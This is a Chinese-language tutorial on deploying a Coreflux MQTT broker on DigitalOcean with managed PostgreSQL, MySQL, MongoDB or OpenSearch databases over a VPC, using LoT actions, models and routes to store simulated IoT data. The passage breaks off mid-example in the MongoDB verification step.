标签 MQTT 下的文章

使用托管数据库部署 Coreflux MQTT 代理

MQTT 代理 通过发布-订阅消息模式连接物联网设备和应用程序,使其成为现代 物联网 基础设施的重要组成部分。Coreflux 是一个 低代码 MQTT 代理,增加了实时数据处理和转换功能,让你可以直接与 DigitalOcean 托管数据库(包括 MongoDBPostgreSQLMySQLOpenSearch)集成,而无需编写自定义集成代码。

你将学到什么: 本教程将引导你部署一个完整的物联网数据管道——从在 DigitalOcean 上设置托管数据库集群和 Coreflux MQTT 代理,到配置安全的 VPC 网络、使用 Coreflux 的物联网语言 (LoT) 构建数据转换模型,以及自动将处理后的物联网数据存储到你选择的数据库中。最终你将获得一个可用于生产环境的设置,能够处理物联网应用的实时消息传递和持久存储。

关键要点

在深入了解分步部署过程之前,以下是你将学到的关键点:

  • 在 DigitalOcean 上部署托管数据库集群(PostgreSQL、MongoDB、MySQL 或 OpenSearch),用于可扩展的物联网数据存储。
  • 使用 Marketplace 镜像或 Docker 在 DigitalOcean Droplet (DigitalOcean的VPC)上设置 Coreflux MQTT 代理。
  • 创建安全的 VPC 网络以连接你的 MQTT 代理和数据库,无需公开暴露。
  • 使用 Coreflux 的物联网语言 (LoT) 构建实时数据管道,实现低代码物联网自动化。
  • 自动转换和存储物联网数据,从 MQTT 主题到数据库表、集合或索引。
  • 验证端到端数据流,从模拟传感器通过转换模型到数据库存储。

本教程为需要实时消息传递结合持久数据存储以及搜索、分析或关系查询等高级功能的物联网应用提供了一个可用于生产环境的基础。

你将构建什么

在本教程结束时,你将得到:

  • 一个用于可扩展存储托管数据库集群(PostgreSQLMongoDBMySQLOpenSearch
  • 一台运行 Coreflux MQTT 代理DigitalOcean Droplet
  • 一个用于安全 物联网通信的虚拟私有云 (VPC) 网络
  • 使用 LoT Notebook 扩展进行的实时数据模拟
  • 低代码数据转换模型和数据库集成路由
  • 用于 物联网自动化 的完整 数据集成与转换 管道

Coreflux 与 DigitalOcean 合作

Coreflux 通过物联网语言编程语言在 DigitalOcean 云平台上提供轻量级 MQTT 代理和数据管道工具,以实现高效的物联网通信。

什么是 MQTT?

MQTT(消息队列遥测传输)是一种轻量级的、发布-订阅网络协议,在物联网生态系统中被广泛采用。专为受限设备和低带宽、高延迟或不稳定的网络设计,MQTT 能够在带宽受限的环境中实现高效、实时的消息传递。

关于 Coreflux

Coreflux 提供了一个轻量级 MQTT 代理,以促进物联网设备与应用程序之间的高效、实时通信,包括每个用例所必需的实时数据转换功能。为可扩展性和可靠性而构建,Coreflux 专为低延迟和高吞吐量至关重要的环境量身定制。

无论你是构建一个小型物联网项目还是部署工业监控系统,Coreflux 都能处理设备之间的消息路由和数据流。

在 DigitalOcean 云平台上使用 Coreflux,你将获得:

数据处理: 在你的数据所在之处集中处理你的数据处理需求,确保实时数据处理。
数据集成: 轻松与其他 DigitalOcean 服务(如托管数据库 PostgreSQL、MongoDB、MySQL 或 OpenSearch)集成,确保为你的所有数据需求提供一个单一且简单的生态系统。
可扩展性: 轻松处理不断增长的数据和设备数量,而不会影响性能。
可靠性: 确保在所有连接的设备之间进行一致且可靠的消息传递。

Coreflux MQTT 和托管数据库架构概述

准备工作

在开始本 MQTT 代理 部署教程之前,你需要:

  • 一个 DigitalOcean 帐户,可在DigitalOcean.com注册,支持绑定信用卡、支付宝或数字货币
  • 了解 MQTT 协议概念和 物联网 架构
  • Visual Studio Code(用于 LoT Notebook 扩展)

预计时间: 本教程大约需要 30-45 分钟完成,具体取决于数据库配置时间(通常每个数据库集群需要 1-5 分钟)。

步骤 1 — 为物联网自动化创建网络基础设施

为安全的 MQTT 通信创建 VPC 网络

首先,你将创建一个虚拟私有云 (VPC),以确保你的 物联网 服务和 MQTT 代理 之间的安全通信,无需公开访问。

  1. 登录你的 DigitalOcean 控制面板
  2. 从左侧导航栏进入 网络VPC
  3. 点击 创建 VPC 网络

DigitalOcean VPC 创建屏幕

  1. 物联网自动化配置你的 VPC:

    • 名称:coreflux-integrations-vpc(或你的 VPC 名称)
    • 数据中心区域:选择法兰克福(或你首选的区域)
    • IP 范围:使用默认值或根据需要配置
    • 描述:为你的 MQTT 代理和数据库 网络添加有意义的描述
  2. 点击 创建 VPC 网络

VPC 将为你所有的物联网资源提供隔离的网络,确保 Coreflux MQTT 代理托管数据库 之间的安全通信。有关 VPC 配置的更多详细信息,请参阅我们关于创建 VPC 网络的教程。

步骤 2 — 为可扩展存储设置托管数据库

根据你的物联网应用需求,选择以下数据库选项之一:

  • PostgreSQL:适用于需要关系查询、ACID 合规性和复杂关系的结构化数据
  • MySQL:适用于结构化工作负载和具有强一致性及广泛工具支持的事务性查询
  • MongoDB:适用于具有可变模式的灵活文档存储和快速开发
  • OpenSearch:适用于高级搜索、分析、日志分析和时间序列数据可视化

设置 PostgreSQL 托管数据库

当你的物联网工作负载需要关系模式强一致性高级 SQL 分析,并由自动备份、监控和维护支持时,DigitalOcean 上的托管 PostgreSQL 是一个很好的选择。

DigitalOcean 托管 PostgreSQL 集群设置

  1. DigitalOcean 控制面板,导航到 数据库
  2. 点击 创建数据库集群
  3. 物联网自动化配置你的 PostgreSQL 集群:

    • 数据库引擎:选择 PostgreSQL
    • 版本:选择最新的稳定版本
    • 数据中心区域:选择法兰克福(与你的 VPC 相同)
    • VPC 网络:选择你创建的 coreflux-integrations-vpc
    • 数据库集群名称:postgresql-coreflux-test
    • 项目:选择你的目标项目
  4. 根据你的 物联网 需求选择你的计划:

    1. 对于开发:基础 计划,1 GB RAM
    2. 对于生产:通用型 或更高,用于可扩展存储
  5. 点击 创建数据库集群

托管数据库 创建过程通常需要 1-5 分钟。完成后,你将被重定向到数据库概览页面,在那里你可以查看连接详细信息并执行管理操作。

为 MQTT 代理集成配置 PostgreSQL 数据库访问

系统将提示你进行入门步骤,显示你的连接详细信息,你可以配置入站访问规则(建议限制为你的 IP 和仅 VPC)。

  1. 点击 开始使用 来配置你的 PostgreSQL 数据库
  2. (可选操作)限制入站连接:

    • 添加你本地计算机的 IP 以进行管理访问
    • droplet 将通过 VPC 网络自动获得允许

PostgreSQL 入站访问和 VPC 规则

对于连接详细信息,你将看到两个选项 - 公共网络和 VPC 网络。第一个用于像 DBeaver 这样的工具进行外部访问,而第二个将由 Coreflux 服务用于访问数据库。

PostgreSQL 公共和 VPC 连接详细信息

  1. 记下提供的连接详细信息,包括公共访问和 VPC 访问(每种都有不同的详细信息):

    • 主机:你的数据库主机名
    • 用户:默认管理员用户
    • 密码:自动生成的安全密码
    • 数据库:身份验证数据库名称
测试 PostgreSQL 数据库连接

你可以使用提供的连接参数,使用公共访问凭证通过 DBeaver 测试 PostgreSQL 连接:

在 DBeaver 中测试 PostgreSQL 连接

创建 PostgreSQL 应用程序数据库和用户(可选)

为了更好的安全性和组织性,为你的 物联网自动化 应用程序创建一个专用用户和数据库。这也可以通过 DBeaver 或 CLI 完成,但 DigitalOcean 提供了一种用户友好的方法:

  1. 转到你的 托管数据库 集群中的 用户与数据库 选项卡
  2. 创建用户

    • 用户名:coreflux-broker-client
    • 密码:自动生成
  3. 创建数据库

    • 数据库名称:coreflux-broker-data

注意: 你可能需要更改数据库内的用户权限,以便能够创建表、插入和选择数据。对于 PostgreSQL,使用 GRANT CREATE, INSERT, SELECT ON DATABASE coreflux-broker-data TO coreflux-broker-client; 授予必要的权限。对于 MySQL,使用 GRANT CREATE, INSERT, SELECT ON coreflux-broker-data.* TO 'coreflux-broker-client'@'%';。

设置 MySQL 托管数据库

当你想要熟悉的 SQL、广泛的生态系统支持以及处理备份、更新和监控的完全托管服务时,DigitalOcean 上的托管 MySQL结构化、事务性物联网数据的理想选择。

DigitalOcean 托管 MySQL 集群设置

  1. DigitalOcean 控制面板,导航到 数据库
  2. 点击 创建数据库集群
  3. 物联网自动化配置你的 MySQL 集群:

    • 数据库引擎:选择 MySQL
    • 版本:选择最新的稳定版本
    • 数据中心区域:选择法兰克福(与你的 VPC 相同)
    • VPC 网络:选择你创建的 coreflux-integrations-vpc
    • 数据库集群名称:mysql-coreflux-test
    • 项目:选择你的目标项目
  4. 根据你的 物联网 需求选择你的计划:

    • 对于开发:基础 计划,1 GB RAM
    • 对于生产:通用型 或更高,用于可扩展存储
  5. 点击 创建数据库集群

托管数据库 创建过程通常需要 1-5 分钟。完成后,你将被重定向到数据库概览页面,在那里你可以查看连接详细信息并执行管理操作。

为 MQTT 代理集成配置 MySQL 数据库访问

系统将提示你进行入门步骤,显示你的连接详细信息,你可以配置入站访问规则(建议限制为你的 IP 和仅 VPC)。

  1. 点击 开始使用 来配置你的 MySQL 数据库
  2. (可选操作)限制入站连接:

    • 添加你本地计算机的 IP 以进行管理访问
    • droplet 将通过 VPC 网络自动获得允许

MySQL 入站访问和 VPC 规则

对于连接详细信息,你将看到两个选项 - 公共网络和 VPC 网络。第一个用于像 DBeaver 这样的工具进行外部访问,而第二个将由 Coreflux 服务用于访问数据库。

MySQL 公共和 VPC 连接详细信息

  1. 记下提供的连接详细信息,包括公共访问和 VPC 访问(每种都有不同的详细信息):

    • 主机:你的数据库主机名
    • 用户:默认管理员用户
    • 密码:自动生成的安全密码
    • 数据库:身份验证数据库名称
测试 MySQL 数据库连接

你可以使用提供的连接参数,使用公共访问凭证通过 DBeaver 测试 MySQL 连接。

注意: 你可能需要更改 DBeaver 的驱动程序设置——设置 allowPublicKeyRetrieval = true。

在 DBeaver 中测试 MySQL 连接

创建 MySQL 应用程序数据库和用户(可选)

为了更好的安全性和组织性,为你的 物联网自动化 应用程序创建一个专用用户和数据库。这也可以通过 DBeaver 或 CLI 完成,但 DigitalOcean 提供了一种用户友好的方法:

  1. 转到你的 托管数据库 集群中的 用户与数据库 选项卡
  2. 创建用户

    • 用户名:coreflux-broker-client
    • 密码:自动生成
  3. 创建数据库

    • 数据库名称:coreflux-broker-data

设置 MongoDB 托管数据库

托管 MongoDB 非常适合灵活或不断演变的物联网负载,让你能够存储异构的传感器文档,而无需严格模式,同时平台处理复制、备份和监控。

创建托管 MongoDB 集群

  1. DigitalOcean 控制面板,导航到 数据库
  2. 点击 创建数据库集群
  3. 物联网自动化配置你的 MongoDB 集群:

    • 数据库引擎:选择 MongoDB
    • 版本:选择最新的稳定版本
    • 数据中心区域:选择法兰克福(与你的 VPC 相同)
    • VPC 网络:选择你创建的 coreflux-integrations-vpc
    • 数据库集群名称:mongodb-coreflux-test
    • 项目:选择你的目标项目
  4. 根据你的 物联网 需求选择你的计划:

    • 对于开发:基础 计划,1 GB RAM
    • 对于生产:通用型 或更高,用于可扩展存储
  5. 点击 创建数据库集群

托管数据库 创建过程通常需要 1-5 分钟。完成后,你将被重定向到数据库概览页面,在那里你可以查看连接详细信息并执行管理操作。

为 MQTT 代理集成配置 MongoDB 数据库访问

系统将提示你进行入门步骤,显示你的连接详细信息,你可以配置入站访问规则(建议限制为你的 IP 和仅 VPC)。

  1. 点击 开始使用 来配置你的 MongoDB 数据库
  2. (可选)限制入站连接:

    • 添加你本地计算机的 IP 以进行管理访问
    • droplet 将通过 VPC 网络自动获得允许

为 MQTT 代理集成配置数据库访问

对于连接详细信息,你将看到两个选项:公共网络和 VPC 网络。第一个用于像 MongoDB Compass 这样的工具进行外部访问,而第二个将由 Coreflux 服务用于访问数据库。

MongoDB 连接详细信息

  1. 记下提供的连接详细信息,包括公共访问和 VPC 访问(每种都有不同的详细信息):

    • 主机:你的数据库主机名
    • 用户:默认管理员用户
    • 密码:自动生成的安全密码
    • 数据库:身份验证数据库名称
测试 MongoDB 数据库连接

你可以使用 MongoDB Compass 或提供的连接字符串,使用公共访问凭证测试 MongoDB 连接:

mongodb://username:password@mongodb-host:27017/defaultauthdb?ssl=true

测试数据库连接

创建 MongoDB 应用程序数据库和用户(可选)

为了更好的安全性和组织性,为你的 物联网自动化 应用程序创建一个专用用户和数据库。这也可以通过 MongoDB Compass 或 CLI 完成,但 DigitalOcean 提供了一种用户友好的方法:

  1. 转到你的 托管数据库 集群中的 用户与数据库 选项卡
  2. 创建用户

    • 用户名:coreflux-broker-client
    • 密码:自动生成
  3. 创建数据库

    • 数据库名称:coreflux-broker-data

设置 OpenSearch 托管数据库

托管 OpenSearch 专为高容量物联网数据的搜索、日志分析和时间序列仪表板而设计,该服务为你管理集群健康、扩展和索引存储。

创建托管 OpenSearch 集群

  1. DigitalOcean 控制面板,导航到 数据库
  2. 点击 创建数据库集群
  3. 物联网自动化配置你的 OpenSearch 集群:

    • 数据库引擎:选择 OpenSearch
    • 版本:选择最新的稳定版本
    • 数据中心区域:选择法兰克福(与你的 VPC 相同)
    • VPC 网络:选择你创建的 coreflux-integrations-vpc
    • 数据库集群名称:opensearch-coreflux-test
    • 项目:选择你的目标项目
  4. 根据你的 物联网 需求选择你的计划:

    1. 对于开发:基础 计划,1 GB RAM
    2. 对于生产:通用型 或更高,用于可扩展存储
  5. 点击 创建数据库集群

托管数据库 创建过程通常需要 1-5 分钟。完成后,你将被重定向到数据库概览页面,在那里你可以查看连接详细信息并执行管理操作。

为 MQTT 代理集成配置 OpenSearch 数据库访问

系统将提示你进行入门步骤,显示你的连接详细信息,你可以配置入站访问规则(建议限制为你的 IP 和仅 VPC)。

  1. 点击 开始使用 来配置你的 OpenSearch 数据库
  2. (可选)限制入站连接:

    • 添加你本地计算机的 IP 以进行管理访问
    • droplet 将通过 VPC 网络自动获得允许

配置数据库访问

对于连接详细信息,你将看到两个选项:公共网络和 VPC 网络。第一个用于工具的外部访问,而第二个将由 Coreflux 服务用于访问数据库。你还将看到访问 OpenSearch 仪表板的 URL 和参数。

连接详细信息

  1. 记下提供的连接详细信息,包括公共访问和 VPC 访问(每种都有不同的详细信息):

    • 主机:你的数据库主机名
    • 用户:默认管理员用户
    • 密码:自动生成的安全密码
    • 数据库:身份验证数据库名称
测试 OpenSearch 数据库连接

你可以使用提供的凭证通过 OpenSearch 仪表板测试 OpenSearch 连接:

测试数据库连接

步骤 3 — 在 DigitalOcean Droplet 上部署 Coreflux MQTT 代理

创建 DigitalOcean Droplet

  1. 在你的 DigitalOcean 控制面板中导航到 Droplets
  2. 点击 创建 Droplet

创建新的 DigitalOcean Droplet

  1. MQTT 代理 部署配置你的 droplet

    • 选择区域:法兰克福(与你的托管数据库相同)
    • VPC 网络:选择 coreflux-integrations-vpc
    • 选择镜像:转到 Marketplace 选项卡
    • 搜索 “Coreflux” 并从 Marketplace 中选择 Coreflux

从 Marketplace 选择 Coreflux

  1. 为你的 物联网 工作负载选择大小

    • 对于开发:基础 计划,2 GB 内存
    • 对于生产:基础通用型 计划,4+ GB 内存以获得可扩展性能
  2. 选择身份验证方法

    • SSH 密钥:推荐用于提高安全性

      1. 可以使用 ssh-keygen 在本地创建密钥
    • 密码:备选方案
  3. 最终确定详细信息

    • 主机名:coreflux-test-broker
    • 项目:选择你的项目
    • 标签:为 DevOps 组织添加相关标签
  4. 点击 创建 Droplet
  5. 查看 Droplet 主页并等待其完成部署

Droplet 部署进行中

替代方案 - 在Docker镜像Droplet上使用Docker安装Coreflux MQTT代理

采用与Coreflux Droplet相同的方法,选择Docker作为市场应用镜像。

一旦你的droplet运行起来,通过已定义的认证方法或Droplet主页上提供的Web控制台,使用SSH连接到它:

ssh root@your-droplet-ip

SSH连接到Coreflux droplet

使用Docker运行Coreflux MQTT代理

docker run -d \
  --name coreflux \
  -p 1883:1883 \
  -p 1884:1884 \
  -p 5000:5000 \
  -p 443:443 \
  coreflux/coreflux-mqtt-broker-t:1.6.3

这个Docker命令:

  • 以分离模式运行容器 (-d)
  • 将容器命名为 coreflux
  • 暴露MQTT和Web界面所需的端口
  • 使用最新的Coreflux镜像

验证MQTT代理是否在运行:

docker ps

你应该看到一个正在运行的容器:

Docker中运行的Coreflux容器

通过使用默认值连接到MQTT代理来验证部署

你可以通过MQTT客户端(如MQTT Explorer)访问MQTT代理,以验证对代理的访问,无论采用何种部署方法。

MQTT Explorer连接到Coreflux代理

步骤4 — 为安全的物联网通信配置防火墙规则(可选)

对于生产环境的物联网自动化部署,配置防火墙规则以限制访问:

  1. 导航到网络防火墙
  2. 点击创建防火墙
  3. 配置MQTT代理安全的入站规则:

    • SSH:来自你IP的端口22
    • MQTT:来自你的物联网应用程序源的端口1883
    • 带TLS的MQTT:用于安全的带TLS的MQTT的端口1884
    • WebSocket:用于通过WebSocket的MQTT的端口5000
    • 带TLS的WebSocket:用于通过带TLS的WebSocket的MQTT的端口443
  4. 将防火墙应用到你的droplet

关于详细的防火墙配置,请参考DigitalOcean的防火墙快速入门教程。生产提示: 将MQTT端口1883限制在特定的源IP或VPC范围,并且对于外部设备连接,优先使用端口1884(带TLS的MQTT)。如果你需要额外的安全层,请考虑使用带有私有网络的DigitalOcean应用平台。

步骤5 — 使用Coreflux的Language of Things设置物联网数据集成

安装LoT Notebook扩展

用于Visual Studio Code的LoTLanguage of ThingsNotebook扩展提供了一个集成的低代码开发环境,用于MQTT代理编程和物联网自动化。了解更多关于Coreflux的Language of Things (LoT)用于低代码物联网自动化的信息。

  1. 打开Visual Studio Code
  2. 转到扩展(Ctrl+Shift+X)
  3. 搜索"LoT Notebooks"
  4. 安装由Coreflux提供的LoT VSCode Notebooks扩展

Visual Studio Code中的LoT Notebook扩展

连接到你的MQTT代理

配置与你的Coreflux MQTT代理的连接,当在顶部栏提示时或通过点击底部左侧栏的MQTT按钮时,使用默认凭据:

  • 用户:root
  • 密码:coreflux

假设没有错误,你将在底部左侧栏看到与代理的MQTT连接状态。

VS Code中的Coreflux MQTT连接状态

步骤6 — 通过Actions在MQTT代理中创建数据

对于这个用例,我们将通过一个转换管道将原始数据集成到数据库中。然而,由于在演示中没有连接到任何MQTT设备,我们将利用LoT的能力,并使用一个Action来模拟设备数据。

在LoT中,Action是一种可执行的逻辑,由特定事件触发,例如定时间隔、主题更新或其他操作或系统组件的显式调用。Actions允许与MQTT主题、内部变量和负载进行动态交互,促进复杂的物联网自动化工作流。

因此,我们可以使用一个以定义的时间间隔在特定主题中生成数据的Action,然后由我们将在下面定义的管道的其余部分使用。

你可以下载包含示例项目的github仓库。

生成模拟物联网数据

使用低代码LoTLanguage of Things)界面创建一个Action来生成模拟传感器数据:

DEFINE ACTION RANDOMIZEMachineData
ON EVERY 10 SECONDS DO
    PUBLISH TOPIC "raw_data/machine1" WITH RANDOM BETWEEN 0 AND 10
    PUBLISH TOPIC "raw_data/station2" WITH RANDOM BETWEEN 0 AND 60

在提供的Notebook中,你还有一个Action可以执行递增计数器来模拟数据,作为提供Action的替代方案。

运行LoT操作以生成模拟物联网数据

当你运行这个Action时,它将:

  • 自动部署到MQTT代理
  • 每10秒生成一次模拟的物联网传感器数据
  • 实时数据发布到特定的MQTT主题
  • LoT Notebook界面中显示同步状态

    • 此状态显示LoT Notebook上的代码是否与代理中运行的代码不同,或者是否完全缺失

步骤7 — 为实时处理创建数据转换模型

使用Language of Things定义数据模型

Coreflux中的模型用于转换、聚合和计算来自输入MQTT主题的值,并将结果发布到新主题。它们是创建适用于你多个数据源的UNS - 统一命名空间 - 的基础。

因此,通过该模型,你可以定义原始物联网数据的结构与转换方式,适用于单个设备,也支持同时处理多个设备(借助通配符+实现)。模型还作为用于可扩展存储托管数据库的关键数据模式。

DEFINE MODEL MachineData WITH TOPIC "Simulator/Machine/+/Data"

    ADD "energy" WITH TOPIC "raw_data/+" AS TRIGGER

    ADD "energy_wh" WITH (energy * 1000)

    ADD "production_status" WITH (IF energy > 5 THEN "active" ELSE "inactive")

    ADD "production_count" WITH (IF production_status EQUALS "active" THEN (production_count + 1) ELSE 0)

    ADD "stoppage" WITH (IF production_status EQUALS "inactive" THEN 1 ELSE 0)

    ADD "maintenance_alert" WITH (IF energy > 50 THEN TRUE ELSE FALSE)

    ADD "timestamp" WITH TIMESTAMP "UTC"

这个低代码模型:

  • 使用通配符+自动应用到所有机器
  • 通过乘以1000将能量转换为瓦时(energy_wh)
  • 根据能量阈值确定生产状态
  • 跟踪生产计数和停机事件
  • 向所有实时数据点添加时间戳
  • 从主题结构中提取机器ID
  • 将结构化数据发布到Simulator/Machine/Data主题(将+替换为每个匹配触发器/源数据格式的主题)

由于我们使用Action生成了两个模拟传感器/机器,我们可以看到模型结构自动应用于两者,同时生成了一个json对象和各个单独的主题。

Coreflux模型发布的转换后的MQTT数据

步骤8 — 为可扩展存储设置数据库集成

选择与你在步骤2中选择的数据库相匹配的数据库集成部分。

PostgreSQL集成

在本节中,你将学习如何将处理后的物联网数据存储到DigitalOcean上的PostgreSQL托管数据库中。

要将处理后的物联网数据存储到PostgreSQL托管数据库中,你需要在Coreflux中定义一个Route。Route使用简单、低代码的配置指定数据如何从你的MQTT代理发送到你的PostgreSQL集群:

DEFINE ROUTE PostgreSQL_Log WITH TYPE POSTGRESQL

    ADD SQL_CONFIG

        WITH SERVER "db-postgresql.db.onmyserver.com"

        WITH PORT 25060

        WITH DATABASE "defaultdb"

        WITH USERNAME "doadmin"

        WITH PASSWORD "AVNS_pass"

        WITH USE_SSL TRUE

        WITH TRUST_SERVER_CERTIFICATE FALSE

使用来自DigitalOcean的你自己的PostgreSQL连接详细信息替换,并在你的LoT Notebook中运行该Route重要提示: 为了更好的安全性和更低的延迟,请使用VPC连接详细信息(而非公共连接)。VPC主机名和端口与公共连接字符串不同 - 请检查你的数据库集群的连接详细信息页面以获取这两个选项。

为PostgreSQL数据库存储更新模型

修改你的LoT模型以使用数据库路由进行可扩展存储,通过将此添加到模型的末尾:

STORE IN "PostgreSQL_Log"

    WITH TABLE "MachineProductionData"

此外,添加一个带有主题的参数,以便在你的托管数据库中为每个条目提供唯一标识符。

DEFINE MODEL MachineData WITH TOPIC "Simulator/Machine/+/Data"

    ADD "energy" WITH TOPIC "raw_data/+" AS TRIGGER

    ADD "device_name" WITH REPLACE "+" WITH TOPIC POSITION 2 IN "+"

    ADD "energy_wh" WITH (energy * 1000)

    ADD "production_status" WITH (IF energy > 5 THEN "active" ELSE "inactive")

    ADD "production_count" WITH (IF production_status EQUALS "active" THEN (production_count + 1) ELSE 0)

    ADD "stoppage" WITH (IF production_status EQUALS "inactive" THEN 1 ELSE 0)

    ADD "maintenance_alert" WITH (IF energy > 50 THEN TRUE ELSE FALSE)

    ADD "timestamp" WITH TIMESTAMP "UTC"

    STORE IN "PostgreSQL_Log"

        WITH TABLE "MachineProductionData"

部署此更新后的操作后,所有数据在更新时应自动存储在数据库中。

MySQL集成

MySQL是一种广泛使用的关系数据库管理系统,非常适合大规模存储和分析物联网数据。在本节中,你将学习如何将你的Coreflux MQTT代理连接到DigitalOcean上的托管MySQL数据库,以便你的实时设备数据能够安全可靠地持久化,用于分析、报告或与其他应用程序集成。

要启用此集成,你必须在Coreflux的LoT(Language of Things)中定义一个Route,指示处理后的数据应该发送到哪里以及如何发送。下面是路由数据到MySQL数据库所需的低代码格式。请务必根据需要替换你自己的连接详细信息:

DEFINE ROUTE MySQL_Log WITH TYPE MYSQL
    ADD SQL_CONFIG
        WITH SERVER "db-mysql.db.onmyserver.com"
        WITH PORT 25060
        WITH DATABASE "defaultdb"
        WITH USERNAME "doadmin"
        WITH PASSWORD "AVNS_pass"
        WITH USE_SSL TRUE
        WITH TRUST_SERVER_CERTIFICATE FALSE

使用来自DigitalOcean的你自己的MySQL连接详细信息替换,并在你的LoT Notebook中运行该Route重要提示: 为了更好的安全性和更低的延迟,请使用VPC连接详细信息(而非公共连接)。如果你遇到连接问题,请验证TRUST_SERVER_CERTIFICATE是否已为你的MySQL版本正确设置 - 某些版本需要TRUE,而其他版本则使用FALSE

为MySQL数据库存储更新模型

修改你的LoT模型以使用数据库路由进行可扩展存储,通过将此添加到模型的末尾:

STORE IN "MySQL_Log"
    WITH TABLE "MachineProductionData"

此外,添加一个带有主题的参数,以便在你的托管数据库中为每个条目提供唯一标识符。

DEFINE MODEL MachineData WITH TOPIC "Simulator/Machine/+/Data"
    ADD "energy" WITH TOPIC "raw_data/+" AS TRIGGER
    ADD "device_name" WITH REPLACE "+" WITH TOPIC POSITION 2 IN "+"
    ADD "energy_wh" WITH (energy * 1000)
    ADD "production_status" WITH (IF energy > 5 THEN "active" ELSE "inactive")
    ADD "production_count" WITH (IF production_status EQUALS "active" THEN (production_count + 1) ELSE 0)
    ADD "stoppage" WITH (IF production_status EQUALS "inactive" THEN 1 ELSE 0)
    ADD "maintenance_alert" WITH (IF energy > 50 THEN TRUE ELSE FALSE)
    ADD "timestamp" WITH TIMESTAMP "UTC"
    STORE IN "MySQL_Log"
        WITH TABLE "MachineProductionData"

部署此更新后的操作后,所有数据在更新时应自动存储在数据库中。

MongoDB集成

MongoDB是一种NoSQL数据库,非常适合存储和查询具有灵活模式的物联网数据。在本节中,你将学习如何将你的Coreflux MQTT代理连接到DigitalOcean上的托管MongoDB数据库,以便你的实时设备数据能够安全可靠地持久化,用于分析、报告或与其他应用程序集成。

要启用此集成,你必须在Coreflux的LoT(Language of Things)中定义一个Route,指示处理后的数据应该发送到哪里以及如何发送。下面是路由数据到MongoDB数据库所需的低代码格式。请务必根据需要替换你自己的连接详细信息:

DEFINE ROUTE mongo_route WITH TYPE MONGODB
    ADD MONGODB_CONFIG
        WITH CONNECTION_STRING "mongodb+srv://<username>:<password>@<cluster-uri>/<database>?tls=true&authSource=admin&replicaSet=<replica-set>"
        WITH DATABASE "admin"

使用来自DigitalOcean的你自己的MongoDB连接详细信息替换,并在你的LoT Notebook中运行该Route。重要提示: 当可用时,请使用VPC连接字符串格式。连接字符串应包括tls=trueauthSource=admin参数。有关MongoDB连接故障排除,请参阅我们关于连接MongoDB的教程。

为MongoDB数据库存储更新模型

修改你的LoT模型以使用数据库路由进行可扩展存储,通过将此添加到模型的末尾:

STORE IN "mongo_route"
    WITH TABLE "MachineProductionData"

此外,添加一个带有主题的参数,以便在你的托管数据库中为每个条目提供唯一标识符。

DEFINE MODEL MachineData WITH TOPIC "Simulator/Machine/+/Data"
    ADD "energy" WITH TOPIC "raw_data/+" AS TRIGGER
    ADD "device_name" WITH REPLACE "+" WITH TOPIC POSITION 2 IN "+"
    ADD "energy_wh" WITH (energy * 1000)
    ADD "production_status" WITH (IF energy > 5 THEN "active" ELSE "inactive")
    ADD "production_count" WITH (IF production_status EQUALS "active" THEN (production_count + 1) ELSE 0)
    ADD "stoppage" WITH (IF production_status EQUALS "inactive" THEN 1 ELSE 0)
    ADD "maintenance_alert" WITH (IF energy > 50 THEN TRUE ELSE FALSE)
    ADD "timestamp" WITH TIMESTAMP "UTC"
    STORE IN "mongo_route"
        WITH TABLE "MachineProductionData"

部署此更新后的操作后,所有数据在更新时应自动存储在数据库中。

OpenSearch集成

OpenSearch是一种分布式搜索和分析引擎,专为大规模数据处理和实时分析而设计。在本节中,你将学习如何将你的Coreflux MQTT代理连接到DigitalOcean上的托管OpenSearch数据库,以便你的实时设备数据能够安全可靠地持久化,用于分析、报告或与其他应用程序集成。

要启用此集成,你必须在Coreflux的LoT(Language of Things)中定义一个Route,指示处理后的数据应该发送到哪里以及如何发送。下面是路由数据到OpenSearch数据库所需的低代码格式。请务必根据需要替换你自己的连接详细信息:

DEFINE ROUTE OpenSearch_log WITH TYPE OPENSEARCH
    ADD OPENSEARCH_CONFIG
        WITH BASE_URL "https://my-opensearch-cluster:9200"
        WITH USERNAME "myuser"
        WITH PASSWORD "mypassword"
        WITH USE_SSL TRUE
        WITH IGNORE_CERT_ERRORS FALSE

使用来自DigitalOcean的你自己的OpenSearch连接详细信息替换,并在你的LoT Notebook中运行该Route。重要提示: 当可用时,请使用VPC基础URL(而非公共URL)。基础URL格式通常为https://your-cluster-hostname:9200。对于OpenSearch仪表板访问,请使用数据库集群详细信息中提供的单独的仪表板URL。有关更多详细信息,请参阅我们的OpenSearch快速入门。

为OpenSearch数据库存储更新模型

修改你的LoT模型以使用数据库路由进行可扩展存储,通过将此添加到模型的末尾:

STORE IN "OpenSearch_Log"
    WITH TABLE "MachineProductionData"

此外,添加一个带有主题的参数,以便在你的托管数据库中为每个条目提供唯一标识符。

DEFINE MODEL MachineData WITH TOPIC "Simulator/Machine/+/Data"
    ADD "energy" WITH TOPIC "raw_data/+" AS TRIGGER
    ADD "device_name" WITH REPLACE "+" WITH TOPIC POSITION 2 IN "+"
    ADD "energy_wh" WITH (energy * 1000)
    ADD "production_status" WITH (IF energy > 5 THEN "active" ELSE "inactive")
    ADD "production_count" WITH (IF production_status EQUALS "active" THEN (production_count + 1) ELSE 0)
    ADD "stoppage" WITH (IF production_status EQUALS "inactive" THEN 1 ELSE 0)
    ADD "maintenance_alert" WITH (IF energy > 50 THEN TRUE ELSE FALSE)
    ADD "timestamp" WITH TIMESTAMP "UTC"
    STORE IN "OpenSearch_Log"
        WITH TABLE "MachineProductionData"

部署此更新后的操作后,所有数据在更新时应自动存储在数据库中。

步骤9 — 验证完整的物联网自动化管道

监控实时数据流

  1. MQTT Explorer:使用MQTT客户端验证实时数据发布
  2. 数据库客户端:连接以验证数据的存储(PostgreSQL使用DBeaver,MongoDB使用MongoDB Compass,OpenSearch使用OpenSearch Dashboards)

验证PostgreSQL存储

使用DBeaver连接到你的PostgreSQL托管数据库以验证可扩展存储

  1. 使用来自你的DigitalOcean数据库的连接字符串
  2. 导航到 coreflux-broker-data 数据库(或你为数据库指定的名称)
  3. 检查 MachineProductionData 表中存储的记录

显示存储的物联网记录的PostgreSQL表

正如我们之前看到的,所有数据都可在MQTT代理中用于其他用途和集成。

带有实时机器数据的MQTT主题

验证MongoDB存储

使用MongoDB Compass连接到你的MongoDB托管数据库以验证可扩展存储

  1. 使用来自你的DigitalOcean数据库的连接字符串
  2. 导航到 coreflux-broker-data 数据库(或你为数据库指定的名称)
  3. 检查 MachineProductionData 集合中存储的文档

检查数据库存储

你应该看到具有类似结构的实时数据文档:

{
  "_id": {
